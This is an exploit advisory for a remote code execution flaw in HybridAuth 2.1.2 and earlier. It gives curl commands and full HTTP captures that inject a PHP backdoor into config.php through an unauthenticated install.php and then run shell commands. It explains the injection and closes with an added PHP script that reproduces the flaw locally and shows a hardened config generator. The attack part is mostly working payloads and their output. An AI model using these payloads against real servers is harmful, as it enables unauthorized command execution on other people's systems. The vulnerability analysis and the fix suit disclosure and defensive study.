-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
######################################################################
#  _     ___  _   _  ____  ____    _  _____
# | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
# | |  | | | |  \| | |  _| |     / _ \ | |
# | |__| |_| | |\  | |_| | |___ / ___ \| |
# |_____\___/|_| \_|\____|\____/_/   \_\_|
#
# HybridAuth <= 2.1.2 Remote Code Execution
# Website : http://hybridauth.sourceforge.net/
# Exploit Author : @u0x (Pichaya Morimoto)
# Release date : August 5, 2014
#
# Special Thanks to 2600 Thailand group
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
########################################################################
[+] Description
============================================================
HybridAuth enables developers to easily build social applications that engage
website visitors and customers on a social level by implementing social sign-in,
social sharing, user profiles, friends lists, activity streams, status updates
and more.
[+] Exploit
============================================================
The default installation leaves "install.php" in place, and it accepts POST data
without any authentication. Two requests are enough: the first makes the installer
write a PHP expression into config.php, the second requests config.php so that the
expression runs. Deleting install.php from the web root once configuration is done
closes the hole.

$ curl http://victim/hybridauth/install.php -d 'GLOBAL_HYBRID_AUTH_URL_BASE=".system($_POST[0]));/*'
$ curl http://victim/hybridauth/config.php -d '0=id;ls -lha'
[+] Proof-of-Concept
============================================================
PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7
Download : http://sourceforge.net/projects/hybridauth/files/hybridauth-2.1.2.zip/download
1. Inject Evil PHP Backdoor

POST /hybridauth/install.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: th,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 51

GLOBAL_HYBRID_AUTH_URL_BASE=".system($_POST[0]));/*

HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 18:53:36 GMT
Server: Apache
X-Powered-By: PHP/5.5.9-1ubuntu4.3
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 2437
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<html>
<head>
<title>HybridAuth Installer</title>
...
2. Gaining access to the PHP backdoor

POST /hybridauth/config.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: th,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

0=id;ls%20-lha

HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 18:54:56 GMT
Server: Apache
X-Powered-By: PHP/5.5.9-1ubuntu4.3
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 403
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 40K
drwxrwxr-x 3 longcat  longcat  4.0K Feb 15  2013 .
drwxr-xr-x 4 longcat  www-data 4.0K Aug  5 01:14 ..
drwxrwxr-x 5 longcat  longcat  4.0K Feb 15  2013 Hybrid
-rw-rw-r-- 1 www-data www-data 2.5K Aug  5 01:53 config.php
-rw-rw-r-- 1 longcat  longcat   488 Feb 15  2013 index.php
-rw-rw-r-- 1 longcat  longcat   18K Feb 16  2013 install.php

Note that config.php is now owned by www-data and carries the timestamp of the
first request: it was rewritten by install.php running as the web server user.
[+] Vulnerability Analysis
============================================================
Filename: ./install.php
...
if( count( $_POST ) ):    // <-- user-controlled input: HTTP POST data

    // read the config template
    $CONFIG_TEMPLATE = file_get_contents( "Hybrid/resources/config.php.tpl" );

    foreach( $_POST AS $k => $v ):
        // strip_tags() is the only filter applied, and it only removes <...>
        // sequences; quotes, parentheses, dots and semicolons pass through
        $v = strip_tags( $v );
        $z = "#$k#";
        // every #KEY# found in the template is replaced with the POST value
        // sent under that key, so we can simply replace these existing values
        // with something fun :)
        $CONFIG_TEMPLATE = str_replace( $z, $v, $CONFIG_TEMPLATE );
    endforeach;
...
    // write the filled-in template out as config.php
    $is_installed = file_put_contents( $GLOBAL_HYBRID_AUTH_PATH_BASE . "config.php", $CONFIG_TEMPLATE );
...

Filename: ./Hybrid/resources/config.php.tpl
...
return
    array(
        "base_url" => "#GLOBAL_HYBRID_AUTH_URL_BASE#",   // <-- #..# is replaced with arbitrary PHP code
...

So this is what the injected "config.php" looks like...

Filename: ./config.php
<?php
...
return
    array(
        "base_url" => "".system($_POST[0]));/*",
        "providers" => array (
            // openid providers
            "OpenID" => array (
                "enabled" => #OPENID_ADAPTER_STATUS#
            ),
...

The payload's leading quote closes the empty string literal, the `.system($_POST[0])`
is concatenated onto it, and the following `)` and `;` close `array(` and end the
`return` statement early. The trailing `/*` is there to comment out the remainder
of the template, including the placeholders that were never replaced because only
one key was posted. Requesting config.php directly with a POST parameter named "0"
therefore runs that parameter as a shell command, as the second request above shows.
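As an added example (not part of the advisory and not HybridAuth's own code), the following PHP script reproduces the substitution loop from install.php against a constructed, abridged copy of config.php.tpl, feeds it the payload used above, and places a hardened generator beside it. The template text, the function names and the hardening logic are this example's own assumptions; HybridAuth's actual fix is not described on this page.

```php
<?php
// Added example, not HybridAuth's code: reproduces the install.php substitution
// flaw against a constructed, abridged copy of config.php.tpl and shows a
// hardened generator beside it. PHP 7+. Run: php install_demo.php

// Constructed stand-in for Hybrid/resources/config.php.tpl. The opening <?php
// tag is omitted so the rendered text can be eval()ed below; the real
// installer writes a complete file.
$vulnerableTemplate = <<<'TPL'
return
	array(
		"base_url" => "#GLOBAL_HYBRID_AUTH_URL_BASE#",
		"providers" => array (
			"OpenID" => array (
				"enabled" => #OPENID_ADAPTER_STATUS#
			),
		),
	);
TPL;

// Same template with the placeholder outside the quotes: the generator, not
// the template, decides how the value is quoted.
$hardenedTemplate = str_replace('"#GLOBAL_HYBRID_AUTH_URL_BASE#"',
                                '#GLOBAL_HYBRID_AUTH_URL_BASE#', $vulnerableTemplate);

// 1. install.php <= 2.1.2, condensed. Every POST key names a placeholder and
//    strip_tags() is the only filter; it removes <...> sequences, so a value
//    built from quotes, parentheses and a dot passes through unchanged.
function vulnerableRender(array $post, string $template): string
{
    foreach ($post as $k => $v) {
        $v = strip_tags($v);
        $template = str_replace("#$k#", $v, $template);
    }
    return $template;
}

// 2. Hardened equivalent (an illustration of the fix, not the project's
//    patch). Only the two known placeholders are filled, base_url must parse
//    as a URL, and var_export() emits it as a PHP string literal so a quote in
//    the input is escaped instead of closing the literal. The status flag can
//    only ever become the token true or false.
function hardenedRender(array $post, string $template): string
{
    $url = (string) ($post['GLOBAL_HYBRID_AUTH_URL_BASE'] ?? '');
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        throw new InvalidArgumentException("base_url is not a valid URL: $url");
    }
    $values = [
        'GLOBAL_HYBRID_AUTH_URL_BASE' => var_export($url, true),
        'OPENID_ADAPTER_STATUS'       => (($post['OPENID_ADAPTER_STATUS'] ?? '') === 'true') ? 'true' : 'false',
    ];
    foreach ($values as $k => $v) {
        $template = str_replace("#$k#", $v, $template);
    }
    return $template;
}

// The request body from the advisory, as PHP decodes it into $_POST.
$attack = ['GLOBAL_HYBRID_AUTH_URL_BASE' => '".system($_POST[0]));/*'];

echo "--- vulnerable install.php output ---\n", vulnerableRender($attack, $vulnerableTemplate), "\n\n";
// The base_url line now reads:  "base_url" => "".system($_POST[0]));/*",
// a PHP expression that runs system() on request data when config.php executes.

echo "--- hardened generator, same input ---\n";
try {
    hardenedRender($attack, $hardenedTemplate);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
// Even without the URL check the value would be inert, because var_export()
// wraps it in a single-quoted literal:
echo "as a literal: ", var_export($attack['GLOBAL_HYBRID_AUTH_URL_BASE'], true), "\n\n";

// A legitimate submission still round-trips through the generated file.
$benign = ['GLOBAL_HYBRID_AUTH_URL_BASE' => 'http://example.org/hybridauth/',
           'OPENID_ADAPTER_STATUS'       => 'true'];
$config = eval(hardenedRender($benign, $hardenedTemplate));
echo "--- hardened generator, benign input ---\n";
var_dump($config['base_url'] === 'http://example.org/hybridauth/',
         $config['providers']['OpenID']['enabled'] === true);
```

The first block of output is the injected file from the advisory, rebuilt locally; the second shows the same request body being refused, and what it would have become as a string literal had it got past the URL check; the third confirms that a normal installation still produces a config that loads.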
Happy Pwning ;)
LongCat
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

...
=10bM
-----END PGP SIGNATURE-----